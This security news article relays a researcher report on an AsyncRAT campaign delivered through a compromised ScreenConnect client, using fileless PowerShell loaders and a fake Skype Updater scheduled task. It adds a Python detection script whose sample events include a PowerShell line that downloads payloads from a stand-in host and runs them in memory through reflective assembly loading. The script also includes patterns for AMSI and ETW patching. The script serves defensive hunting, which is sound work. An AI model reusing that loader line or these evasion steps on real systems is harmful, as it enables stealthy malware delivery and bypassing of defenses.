LevelBlue researchers warn of a campaign abusing ConnectWise ScreenConnect to deploy AsyncRAT. Attackers use VBScript/PowerShell loaders and achieve persistence via a fake Skype updater.
ConnectWise ScreenConnect is a remote desktop and remote support software designed to enable secure, real-time access to computers and devices from anywhere. IT professionals, managed service providers (MSPs), and businesses widely utilize it to troubleshoot, maintain, and remotely manage endpoints.
The attack started from a compromised ScreenConnect client: the threat actors opened an interactive session through a malicious relay domain (relay.shipperzone[.]online) tied to unauthorized ScreenConnect deployments.
A VBScript launched PowerShell commands that fetched two payloads, wrote them to the C:\Users\Public directory, and ran them directly in memory. Rather than dropping an executable and starting it as a new process, the loader decoded the fetched data into .NET assemblies and loaded them reflectively, a classic fileless technique that leaves no executable on disk for file-based scanning and makes detection and response much harder.
“The two payloads, logs.ldk and logs.ldr, were downloaded from a remote server. These files were written to the C:\Users\Public\ directory and loaded into memory using reflection. The script converted the first-stage payload (logs.ldk) into a byte array and passed the second (logs.ldr) directly to the Main() method. The script retrieves encoded data from the web, decodes it in-memory, and invokes a method in a dynamically loaded .NET assembly.” reads the report published by LevelBlue.
“This technique exemplifies fileless malware: no executable is written to disk, and all malicious logic is executed in-memory.”
Obfuscator.dll is the first in-memory stage of the AsyncRAT infection chain. It starts execution, sets up persistence through a fake “Skype Updater” scheduled task, and disables defenses such as AMSI and ETW. The component is built around three core classes that handle initialization, dynamic payload loading, and anti-analysis tactics, keeping the stage stealthy and preparing the system for the main payload.
AsyncClient.exe is the core C2 engine of the AsyncRAT attack chain. It decrypts its configuration with AES-256, connects to the C2 servers, and parses commands using a custom protocol. The malware gathers system and security details, monitors user activity with a keylogger, and exfiltrates sensitive data such as browser extension data. Persistence is maintained through scheduled tasks created by the CreateLoginTask() function seen in Obfuscator.dll, or redundantly recreated from AsyncClient.
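The chain described above (ScreenConnect session via the rogue relay domain, PowerShell writing logs.ldk/logs.ldr under C:\Users\Public, reflective assembly loading, and a "Skype Updater" scheduled task) gives defenders a handful of concrete artifacts to hunt for. The Python below is an added example, not code from the LevelBlue report or from the article: it scores constructed log lines against those indicators and assigns a verdict. The event text, the log-source labels, the AMSI/ETW patch strings, and the split into strong and weak indicators are my own assumptions; only the domain, payload names, drop directory and task name come from the report as relayed here.

```python
import re
from dataclasses import dataclass

# Indicator regexes. The relay domain, the logs.ldk/logs.ldr names, the
# C:\Users\Public drop directory and the "Skype Updater" task name come from
# the report as relayed above; the AMSI/ETW strings are common patch targets
# and an assumption, as is the split into STRONG and weak indicators.
INDICATORS = {
    "relay_domain":    re.compile(r"relay\.shipperzone\.online", re.I),
    "ldk_ldr_payload": re.compile(r"\blogs\.ld[kr]\b", re.I),
    "fake_updater":    re.compile(r"skype\s*updater", re.I),
    "amsi_etw_patch":  re.compile(r"AmsiScanBuffer|amsiInitFailed|EtwEventWrite", re.I),
    "reflective_load": re.compile(r"\[(System\.)?Reflection\.Assembly\]::Load\(", re.I),
    "public_drop":     re.compile(r"C:\\Users\\Public\\", re.I),
    "entry_invoke":    re.compile(r"(GetMethod\(\s*['\"]Main['\"]\s*\)|EntryPoint)\.Invoke\(", re.I),
}
# A single strong indicator is enough on its own; weak ones must combine.
STRONG = {"relay_domain", "ldk_ldr_payload", "fake_updater", "amsi_etw_patch"}


@dataclass
class Finding:
    host: str
    source: str
    matched: list
    verdict: str


def match_indicators(text: str) -> list:
    """Return the names of every indicator whose regex hits the event text."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def verdict_for(matched) -> str:
    """Combine matched indicators into high / medium / low / none."""
    m = set(matched)
    if m & STRONG or {"reflective_load", "public_drop"} <= m:
        return "high"
    if "reflective_load" in m or {"entry_invoke", "public_drop"} <= m:
        return "medium"
    return "low" if m else "none"


def triage(events) -> list:
    """Score each event dict ({host, source, text}) and return Findings in order."""
    return [
        Finding(ev["host"], ev["source"], matched := match_indicators(ev["text"]),
                verdict_for(matched))
        for ev in events
    ]


# Constructed sample events (not real telemetry). Sources mimic a PowerShell
# script-block log (4104), a ScreenConnect client log line and a task-creation
# audit event (4698); the exact formats are assumptions.
SAMPLE_EVENTS = [
    {"host": "WS01", "source": "PowerShell/4104",
     "text": r"Get-ChildItem C:\Users\Public\Documents | Measure-Object"},
    {"host": "WS01", "source": "ScreenConnect.ClientService",
     "text": "Session connecting to relay relay.shipperzone.online:443"},
    {"host": "WS01", "source": "PowerShell/4104",
     "text": (r"$w=New-Object Net.WebClient;"
              r"$w.DownloadFile('http://example.invalid/logs.ldk','C:\Users\Public\logs.ldk');"
              r"$w.DownloadFile('http://example.invalid/logs.ldr','C:\Users\Public\logs.ldr');"
              r"$b=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\Users\Public\logs.ldk'));"
              r"$a=[System.Reflection.Assembly]::Load($b);"
              r"$a.EntryPoint.Invoke($null,@(,[IO.File]::ReadAllText('C:\Users\Public\logs.ldr')))")},
    {"host": "WS01", "source": "Security/4698",
     "text": r"TaskName: \Skype Updater  Author: WS01\user  Trigger: Logon"},
]


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.verdict:6} {f.host} {f.source}: {', '.join(f.matched) or '-'}")
```

The first sample only touches C:\Users\Public, which legitimate software does constantly, so it scores low on its own; the loader line is high because it stacks the payload names, the drop directory and an in-memory Assembly.Load, and the relay domain and task name are each sufficient by themselves. In practice, feed the function real 4104 script-block text and task-creation events, and treat the weak indicators as a place to tune rather than alert on directly.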
“Fileless malware continues to evade modern defenses due to its stealthy nature and reliance on legitimate system tools for execution.” concludes the report. “This approach bypasses traditional disk-based detection by operating in memory, making these threats harder to detect, analyze, and eradicate.”
(SecurityAffairs – hacking, AsyncRAT)